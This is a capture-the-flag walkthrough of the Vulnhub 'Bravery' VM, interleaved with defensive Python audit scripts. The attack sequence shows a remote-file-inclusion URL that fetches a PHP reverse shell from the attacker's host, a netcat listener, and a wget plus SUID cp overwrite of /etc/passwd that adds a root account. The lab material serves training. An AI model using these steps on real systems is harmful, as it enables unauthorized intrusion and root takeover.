digitalworld.local-BRAVERY: Vulnhub Walkthrough

Today we will be solving a boot2root lab from Vulnhub called Bravery. Like many other labs, it is a good way to keep your penetration testing skills sharp while getting some variety.

Download it from here: https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

Penetration Methodologies

Scanning

  • Netdiscover
  • Nmap

Enumeration

  • Mount NFS share directory
  • SMB shared file enumeration

Exploiting

  • Abusing CMS via RFI
  • Obtaining reverse shell via netcat

Privilege Escalation

  • Abusing SUID binary
  • Capture the Flag

Walkthrough

Scanning

Let’s start with network scanning to identify the IP of the VM with the help of netdiscover.

So we have our target IP, 192.168.1.105. Now let’s scan its ports and services with nmap.

nmap -A 192.168.1.105

The nmap scan gave a fruitful result: many services are running on various ports.

Enumeration

We found that a network file share service (NFS) is available on port 2049, so we decided to check for shared directories on the network. We installed the NFS client on our local machine and ran the following command to identify the shared directories that can be mounted on our local computer.

showmount -e 192.168.1.105

We found that /var/nfsshare is a shared directory that we can mount on our local machine as shown below:

mkdir /tmp/raj
mount -t nfs 192.168.1.105:/var/nfsshare /tmp/raj
cd /tmp/raj
ls
cat discovery
cat enumeration
cat explore
cat password.txt
cat qwertyuioplkjhgfdsazxcvbnm

Hmmm!!! After exploring all the files, we concluded that “qwertyuioplkjhgfdsazxcvbnm” could be the password.
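The share above was mountable by anyone on the network and held a credential in plain text. The owner of such a fileserver would want to review /etc/exports for exactly that shape. The script below is an added example, not part of the walkthrough and not the VM’s real configuration: it parses a constructed exports file (the sample lines, paths and client addresses are made up for illustration) and flags exports open to every host, writable by every host, or carrying no_root_squash or insecure.

```python
import re
from typing import List, Set, Tuple

# Constructed sample of an /etc/exports file. It is NOT the real configuration
# of the Bravery VM (the walkthrough never shows it); it only imitates the
# shape of a world-mountable export like /var/nfsshare next to two tighter ones.
SAMPLE_EXPORTS = """\
# every host may mount this share and remote root stays root
/var/nfsshare *(rw,sync,no_root_squash)
# restricted to one subnet, read-only, root squashed (the safer shape)
/srv/backup 192.168.1.0/24(ro,sync,root_squash)
# per-host entries; the second one accepts unprivileged source ports
/home/shared 192.168.1.50(rw,sync) 192.168.1.51(rw,sync,insecure)
"""

# <client>(<opt,opt,...>) ; the option list may be absent entirely
CLIENT_RE = re.compile(r"^([^(\s]+)(?:\(([^)]*)\))?$")

Finding = Tuple[str, str, str]  # (export path, client spec, issue)


def parse_exports(text: str) -> List[Tuple[str, str, Set[str]]]:
    """Return (path, client, options) triples, one per client spec per export line."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], fields[1:]
        for spec in clients:
            m = CLIENT_RE.match(spec)
            if not m:
                continue
            client, opts = m.group(1), m.group(2) or ""
            entries.append((path, client, {o for o in opts.split(",") if o}))
    return entries


def audit_exports(text: str) -> List[Finding]:
    """Flag exports that a fileserver owner would want to look at twice."""
    findings: List[Finding] = []
    for path, client, opts in parse_exports(text):
        everyone = client == "*"  # exportfs wildcard: any host may mount
        if everyone:
            findings.append((path, client, "exported to every host (no client restriction)"))
        if everyone and "rw" in opts:
            findings.append((path, client, "writable by every host"))
        if "no_root_squash" in opts:
            findings.append((path, client, "no_root_squash: remote root keeps uid 0 on this export"))
        if "insecure" in opts:
            findings.append((path, client, "insecure: accepts requests from unprivileged client ports"))
    return findings


if __name__ == "__main__":
    for path, client, issue in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:<16} {client:<20} {issue}")
```

Run against the sample, the world-mountable export produces three findings and the insecure per-host entry one. Restricting the client list and keeping root_squash addresses the configuration side; the credential found in the share contents is a separate problem that no exports option fixes.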

Port 445 is also open for SMB, and we have just obtained a password, so we can try connecting to SMB to list its shared folders. But first we need to enumerate the SMB shares, and for that we can use enum4linux.

enum4linux 192.168.1.105

As you can see, enum4linux showed two shared folders: anonymous and secured. We can access them with the help of smbclient.

smbclient //192.168.1.105/anonymous
password: qwertyuioplkjhgfdsazxcvbnm

We successfully accessed the shared folder “anonymous”, where I saw some user folders. But while doing internal recon there, I didn’t notice any interesting clues.

So I moved on to the “secured” share, where I found three files, which I downloaded to my local computer.

smbclient //192.168.1.105/secured -U David
password: qwertyuioplkjhgfdsazxcvbnm
get david.txt
get genevieve.txt
get README.txt

Then I opened each file and found some helpful URLs, which we are going to visit one by one. Moreover, the last line hinted at a CMS login.

Initially, we looked at the URL given below, but it was of no use to us.

//192.168.1.105/devlopmentsecretpage

We then explored another URL and found nothing useful here either.

//192.168.1.105/devops/directortestpagev1.php

At last we moved on to the third and final URL, found in genevieve.txt. Fortunately, this web page differed from the two previous results and looked like it could be a CMS.

By exploring the other tabs I found a Cuppa CMS login page. This might be a turning point, as we can now attempt to exploit Cuppa CMS.

Exploiting

Without wasting time, I dug out a Cuppa exploit with searchsploit: the CMS is vulnerable to LFI/RFI.

When I checked the PoC, I found the Remote File Inclusion URL. We now have to prepare a reverse shell for exploiting the RFI.

Therefore, I used php-reverse-shell from /usr/share/webshells/php, changed the listening IP to Kali’s IP, then launched a Python HTTP server for the file transfer and started a netcat listener on the listening port.

When everything is ready, just trigger the following URL to exploit the RFI.

//192.168.1.105/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=//192.168.1.110:8000/shell.php?
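A request of the shape above leaves a distinctive trace in the web server’s access log: an include parameter whose value is a URL, a scheme-relative //host path, a PHP stream wrapper, or a ../ traversal. The script below is an added example, not part of the walkthrough: it scans constructed Apache combined-format log lines (made up for illustration; the only real values reused are the path and IP addresses shown above) and reports each suspicious parameter with its source address and kind.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format access log lines. They are NOT taken from
# the Bravery VM; they reproduce the shape of the request used above, plus a
# percent-encoded variant, a traversal attempt and two benign requests.
SAMPLE_LOG = """\
192.168.1.110 - - [10/Mar/2019:10:15:01 +0000] "GET /genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.1.110:8000/shell.php? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.23 - - [10/Mar/2019:10:15:07 +0000] "GET /genevieve/cuppaCMS/index.php?page=home HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.1.110 - - [10/Mar/2019:10:16:12 +0000] "GET /genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=%2F%2F192.168.1.110%3A8000%2Fshell.php HTTP/1.1" 200 512 "-" "curl/7.64.0"
192.168.1.110 - - [10/Mar/2019:10:16:40 +0000] "GET /genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=../../../../etc/passwd HTTP/1.1" 200 1880 "-" "curl/7.64.0"
192.168.1.23 - - [10/Mar/2019:10:17:00 +0000] "POST /genevieve/cuppaCMS/login.php HTTP/1.1" 302 0 "http://192.168.1.105/genevieve/cuppaCMS/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# PHP stream wrappers an include() would open (php://input, data:, phar:, ...)
WRAPPER_RE = re.compile(r"^(?:php|data|expect|phar|zip|glob|compress\.\w+):", re.I)
# absolute URL with any scheme, or a scheme-relative //host/... reference
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*:)?//", re.I)
# a '..' path segment anywhere in the value
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")


def classify_value(value: str) -> Optional[str]:
    """Label a query-string value as 'wrapper', 'rfi', 'lfi' or None (benign)."""
    v = unquote(value).strip()  # parse_qsl decoded once; undo a second layer too
    if WRAPPER_RE.match(v):
        return "wrapper"
    if REMOTE_RE.match(v):
        return "rfi"
    if TRAVERSAL_RE.search(v):
        return "lfi"
    return None


def scan_access_log(text: str) -> List[Dict[str, str]]:
    """Return one hit per suspicious query parameter found in the log text."""
    hits: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                hits.append({"ip": m.group("ip"), "path": parts.path, "param": name,
                             "value": value, "kind": kind, "status": m.group("status")})
    return hits


if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG):
        print(f"{h['kind']:<8} {h['ip']:<15} {h['status']} {h['path']} {h['param']}={h['value']}")
```

On the sample this yields two rfi hits and one lfi hit, all from the same source address, with a 200 status that tells the responder the include most likely succeeded. On the hardening side, the page’s exploit depends on the include target being taken straight from a request parameter; keeping PHP’s allow_url_include directive off blocks the remote variant, and mapping the parameter to an allow-list of local files rather than passing it to include() removes both variants.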

We get a netcat session on the victim’s machine as soon as we trigger the URL. Now we have a low-privilege shell and need to escalate to a higher-privilege shell. Therefore, to find SUID-enabled binaries, I run the following command.

find / -perm -u=s -type f 2>/dev/null

Hmmm! Here I notice that cp (the copy command) has the SUID bit set, which means I can copy any file as root. Now let’s try to escalate privileges by abusing this SUID binary to copy our edited /etc/passwd file onto the victim’s machine.

Privilege Escalation

Suppose I would like to create a new user (raj) with root privileges in the /etc/passwd file of the victim’s machine. First we need to copy the content of the victim’s /etc/passwd into a text file on our local machine, then generate a salted password hash for user raj with the help of OpenSSL and copy the hash value.

Now open the text file where you pasted the content of the victim’s /etc/passwd and add a new row for user raj along with the hash value we generated. Name the file passwd and transfer it to the victim machine so that we can replace the VM’s original /etc/passwd with our edited one.

To download the passwd file onto the victim’s machine, execute the following commands and get root access to grab the flag.

cd /tmp
wget //192.168.1.110:8000/passwd
cp passwd /etc/passwd
su raj
cd /root
ls
cat proof.txt
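The root access above rests on two artefacts that persist after the box is rooted: a second uid 0 account, and a password hash sitting in /etc/passwd itself rather than in /etc/shadow. The script below is an added example, not part of the walkthrough: it audits a constructed passwd excerpt (made up for illustration; the hash for raj is a placeholder, not a real OpenSSL output) and reports extra uid 0 accounts, hashes or empty passwords in the password field, duplicate names and malformed lines.

```python
from typing import List, Tuple

# Constructed /etc/passwd excerpt modelled on the backdoor described above. It
# is NOT the Bravery VM's real file; the 'raj' line shows the shape left behind:
# uid 0 and an MD5-crypt style hash (a placeholder here) in the password field.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
david:x:1000:1000:David:/home/david:/bin/bash
genevieve:x:1001:1001:Genevieve:/home/genevieve:/bin/bash
raj:$1$raj.salt$PLACEHOLDERHASHxxxxxxx:0:0:root:/root:/bin/bash
"""

# password-field values that mean "look in /etc/shadow" or "locked"
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}

Finding = Tuple[str, str]  # (account name or line marker, issue)


def audit_passwd(text: str) -> List[Finding]:
    """Report accounts in a passwd file that should not be there or are mis-shaped."""
    findings: List[Finding] = []
    seen_names = set()
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry (expected 7 colon-separated fields)"))
            continue
        name, pw, uid, gid, _gecos, _home, _shell = fields
        if name in seen_names:
            findings.append((name, "duplicate account name"))
        seen_names.add(name)
        if not uid.isdigit():
            findings.append((name, f"non-numeric uid {uid!r}"))
            continue
        # any uid 0 entry that is not root is a second superuser login
        if int(uid) == 0 and name != "root":
            findings.append((name, "uid 0 account other than root"))
        # a hash here is honoured directly, bypassing /etc/shadow and its permissions
        if pw not in SHADOWED_OR_LOCKED:
            issue = "empty password field" if pw == "" else "password hash stored in passwd instead of shadow"
            findings.append((name, issue))
    return findings


if __name__ == "__main__":
    for who, issue in audit_passwd(SAMPLE_PASSWD):
        print(f"{who:<12} {issue}")
```

On the sample, only raj is reported, twice: once for uid 0 and once for the inline hash. The same review would pair this with a comparison of the current SUID list (the find command shown earlier) against a known-good baseline, since a SUID cp is what made the file replacement possible in the first place.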

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets fan.